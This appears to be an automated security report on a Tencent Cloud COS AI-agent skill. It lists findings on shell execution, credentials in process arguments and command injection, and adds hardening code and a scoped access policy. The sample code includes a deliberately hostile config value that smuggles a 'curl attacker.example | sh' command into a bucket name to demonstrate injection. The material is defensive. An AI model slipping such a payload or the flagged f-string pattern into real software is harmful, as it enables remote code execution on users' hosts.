Trust Assessment
tencentcloud-cos-skill received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 14 findings: 5 critical, 6 high, 2 medium, and 1 low severity. Key findings include Arbitrary command execution, Dangerous call: subprocess.Popen(), Dangerous call: subprocess.run().
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100; the critical shell-execution findings below all come from that layer.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (14)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Arbitrary command execution.** Python shell execution (os.system, subprocess). Review all shell execution calls: ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/shawnminh/tencentcloud-cos/scripts/cos_wrapper.py:109 |
| CRITICAL | **Arbitrary command execution.** Python shell execution (os.system, subprocess). Review all shell execution calls: ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/shawnminh/tencentcloud-cos/test_skill.py:62 |
| CRITICAL | **Arbitrary command execution.** Python shell execution (os.system, subprocess). Review all shell execution calls: ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/shawnminh/tencentcloud-cos/test_skill.py:73 |
| CRITICAL | **Arbitrary command execution.** Python shell execution (os.system, subprocess). Review all shell execution calls: ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/shawnminh/tencentcloud-cos/test_skill.py:253 |
| CRITICAL | **Credentials exposed in command-line arguments.** `scripts/cos_wrapper.py` builds the command that launches `npx cos-mcp` and passes `TENCENT_COS_SECRET_ID` and `TENCENT_COS_SECRET_KEY` as command-line arguments. A process's argument vector is readable by other processes on the host (for example via `ps aux` or `/proc/<pid>/cmdline`) and is routinely captured by process-monitoring and audit tooling, so the credentials leak to anything that can list processes. Do not pass secrets as arguments; use environment variables, a configuration file with restricted permissions, or a secret manager. Environment variables are still readable from `/proc/<pid>/environ` by processes running as the same user, so this narrows the exposure rather than removing it; if `cos-mcp` can read credentials from stdin or a temporary file, that is safer still. | LLM | scripts/cos_wrapper.py:90 |
| HIGH | **Dangerous call: subprocess.Popen().** Call to 'subprocess.Popen()' detected in function 'start_mcp_server'. This can execute arbitrary code. Avoid dangerous functions such as exec/eval/os.system; use safer alternatives. | Static | skills/shawnminh/tencentcloud-cos/scripts/cos_wrapper.py:109 |
| HIGH | **Dangerous call: subprocess.run().** Call to 'subprocess.run()' detected in function 'check_dependencies'. This can execute arbitrary code. Avoid dangerous functions such as exec/eval/os.system; use safer alternatives. | Static | skills/shawnminh/tencentcloud-cos/test_skill.py:62 |
| HIGH | **Dangerous call: subprocess.run().** Call to 'subprocess.run()' detected in function 'check_dependencies'. This can execute arbitrary code. Avoid dangerous functions such as exec/eval/os.system; use safer alternatives. | Static | skills/shawnminh/tencentcloud-cos/test_skill.py:73 |
| HIGH | **Dangerous call: subprocess.run().** Call to 'subprocess.run()' detected in function 'run_example'. This can execute arbitrary code. Avoid dangerous functions such as exec/eval/os.system; use safer alternatives. | Static | skills/shawnminh/tencentcloud-cos/test_skill.py:253 |
| HIGH | **Potential command injection via unescaped configuration values.** `scripts/cos_wrapper.py` uses f-strings to embed configuration values (`Region`, `Bucket`, `SecretId`, `SecretKey`, `DatasetName`) directly into the command string it hands to `subprocess.Popen`. An attacker who can control or influence any of those values can inject shell metacharacters (`;`, `&`, `|`, `$()`, `` ` ``) and execute arbitrary commands on the host. Pass the command to `subprocess.Popen` as a list of arguments (e.g., `['npx', 'cos-mcp', '--Region', self.config['Region'], ...]`) rather than a single string, and do not use `shell=True`; then each value reaches the child as one argument regardless of its content. If a shell string is unavoidable, quote every value with a proper shell-escaping routine. | LLM | scripts/cos_wrapper.py:88 |
| HIGH | **Unpinned dependency with global installation.** The skill's `install.sh` script and manifest run `npm install -g cos-mcp@latest`. Installing globally from `@latest` with no version pin is a supply-chain risk: if the `cos-mcp` maintainer's account or repository is compromised, the next install pulls the malicious release, and it runs with the skill's cloud credentials. Pin `cos-mcp` to a specific, known-good version (e.g., `npm install -g cos-mcp@1.2.3`), re-verify the package before each version bump, and consider a lock file or a private registry. | LLM | install.sh:90 |
| MEDIUM | **Sensitive environment variable access: $HOME.** Access to '$HOME' detected in shell context. Verify that the access is necessary and that the value is not exfiltrated. | Static | skills/shawnminh/tencentcloud-cos/install.sh:153 |
| MEDIUM | **Credential placeholders in configuration templates.** The `install.sh` and `package_skill.sh` scripts generate `clawdbot_config.json` and `env.template` with placeholder values for `TENCENT_COS_SECRET_ID` and `TENCENT_COS_SECRET_KEY` written directly into the JSON/text. Although these are templates, they encourage users to keep credentials in plain text in configuration files, which are easily exposed once committed to version control, shared, or stored on an insecure system. Change the templates to state that credentials must come from environment variables or a secret manager, for example `"TENCENT_COS_SECRET_ID": "${TENCENT_COS_SECRET_ID}"`, or omit the placeholders and document how to set them securely. | LLM | install.sh:150 |
| LOW | **Skill requires broad cloud credentials.** The skill requires `TENCENT_COS_SECRET_ID` and `TENCENT_COS_SECRET_KEY`, which are typically highly privileged Tencent Cloud credentials, and then performs file management, image processing, and search. The skill does not define the permissions itself, but it implicitly encourages the use of keys with broad access, violating least privilege. Recommend that users create a dedicated CAM sub-account with the minimum permissions the skill needs, and document the specific COS and CI permissions required instead of relying on full-access keys. | LLM | SKILL.md:1 |
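The two `cos_wrapper.py` findings above (credentials in argv, and f-string command construction) share one fix, shown here as an added example. This is not the skill's own code: it assumes a config dict with the keys the report names (`Region`, `Bucket`, `SecretId`, `SecretKey`, `DatasetName`), a hypothetical `examplebucket-1250000000` bucket, and that `cos-mcp` can read `TENCENT_COS_SECRET_ID` / `TENCENT_COS_SECRET_KEY` from its environment, which the report does not confirm. The unsafe builder reproduces the flagged pattern; `shell_operators_in` tokenises the result the way a POSIX shell would, so the injection is visible without executing anything; the hardened builder validates values against an allowlist and returns an argv list plus an environment for `subprocess.Popen` with `shell=False`.

```python
"""Added example: hardening the subprocess pattern SkillShield flagged in
cos_wrapper.py. Not the skill's code; config keys, bucket name and cos-mcp's
env-var support are assumptions."""
import os
import re
import shlex
import subprocess
from typing import Dict, List, Tuple

# Constructed sample configs. HOSTILE_CONFIG carries a shell-injection payload
# in Bucket; CLEAN_CONFIG is what a legitimate config looks like.
HOSTILE_CONFIG = {
    "Region": "ap-guangzhou",
    "Bucket": "examplebucket-1250000000; curl http://attacker.example/x | sh",
    "SecretId": "AKIDEXAMPLESECRETID",
    "SecretKey": "EXAMPLESECRETKEY",
    "DatasetName": "demo",
}
CLEAN_CONFIG = dict(HOSTILE_CONFIG, Bucket="examplebucket-1250000000")

SHELL_OPERATORS = {";", "|", "||", "&", "&&"}


def build_command_unsafe(cfg: Dict[str, str]) -> str:
    """The flagged pattern: one f-string, later run with shell=True.

    Every value is spliced in as shell syntax, and both secrets land in the
    child's argv, readable via `ps` or /proc/<pid>/cmdline.
    """
    return (
        f"npx cos-mcp --Region {cfg['Region']} --Bucket {cfg['Bucket']} "
        f"--SecretId {cfg['SecretId']} --SecretKey {cfg['SecretKey']} "
        f"--DatasetName {cfg['DatasetName']}"
    )


def shell_operators_in(cmd: str) -> List[str]:
    """Tokenise cmd the way a POSIX shell would and return the control
    operators it contains. Nothing is executed; this only shows the split."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return [tok for tok in lexer if tok in SHELL_OPERATORS]


# Allowlist for values that become command-line arguments. Requiring an
# alphanumeric first character also stops a value such as "--SecretKey" from
# being parsed by cos-mcp as an option (argument injection).
ARG_VALUE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def build_command_safe(cfg: Dict[str, str]) -> Tuple[List[str], Dict[str, str]]:
    """Return (argv, env) for subprocess.Popen with shell=False.

    Non-secret values are validated and passed as separate argv elements, so
    the kernel hands them to cos-mcp verbatim; secrets go only into env
    (assumed to be read by cos-mcp) and never appear in the process list.
    """
    for key in ("Region", "Bucket", "DatasetName"):
        if not ARG_VALUE.fullmatch(cfg[key]):
            raise ValueError(f"{key} contains characters outside the allowlist")
    argv = [
        "npx", "cos-mcp",
        "--Region", cfg["Region"],
        "--Bucket", cfg["Bucket"],
        "--DatasetName", cfg["DatasetName"],
    ]
    env = dict(os.environ)
    env["TENCENT_COS_SECRET_ID"] = cfg["SecretId"]
    env["TENCENT_COS_SECRET_KEY"] = cfg["SecretKey"]
    return argv, env


def is_accepted(cfg: Dict[str, str]) -> bool:
    """True if the allowlist lets cfg through to Popen."""
    try:
        build_command_safe(cfg)
        return True
    except ValueError:
        return False


def start_mcp_server(cfg: Dict[str, str]) -> subprocess.Popen:
    """Hardened replacement for the wrapper's start_mcp_server. Not invoked
    below because it would actually launch npx."""
    argv, env = build_command_safe(cfg)
    return subprocess.Popen(argv, env=env, stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)  # shell defaults to False


if __name__ == "__main__":
    unsafe = build_command_unsafe(HOSTILE_CONFIG)
    print("unsafe command:", unsafe)
    print("shell operators smuggled in:", shell_operators_in(unsafe))
    print("hardened argv (no secrets):", build_command_safe(CLEAN_CONFIG)[0])
    print("hostile config accepted by hardened builder:", is_accepted(HOSTILE_CONFIG))
```

The argv list alone already stops metacharacter injection, since no shell ever parses it; the allowlist is defence in depth against argument injection into `cos-mcp`'s own option parser. Note that moving secrets into the environment does not hide them from processes running as the same user, which can still read `/proc/<pid>/environ`.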
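For the LOW finding on broad credentials, this is an added example of the kind of scoped CAM policy a user could attach to a dedicated sub-account instead of a full-access key; it is not part of the skill and not taken from the page. The region `ap-guangzhou`, APPID `1250000000`, bucket `examplebucket-1250000000` and prefix `skill-data/` are placeholders, and the action list covers only object read/write/list for the file-management features; the image-processing (CI) and search features the report mentions would need additional actions that are not shown here and should be looked up in the Tencent CAM documentation before use. The over-broad equivalent that a root API key amounts to is `"action": ["cos:*"]` on `"resource": ["*"]`.

```json
{
  "version": "2.0",
  "statement": [
    {
      "effect": "allow",
      "action": [
        "cos:GetBucket",
        "cos:HeadObject",
        "cos:GetObject",
        "cos:PutObject",
        "cos:DeleteObject"
      ],
      "resource": [
        "qcs::cos:ap-guangzhou:uid/1250000000:examplebucket-1250000000/skill-data/*"
      ]
    }
  ]
}
```

Scoping the resource to a single bucket and prefix means a leaked `TENCENT_COS_SECRET_KEY` (the realistic outcome of the two argv findings above) exposes one directory rather than every bucket in the account.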
Embed Code
[SkillShield report for tencentcloud-cos-skill](https://skillshield.io/report/bcee064a21a45413)
Powered by SkillShield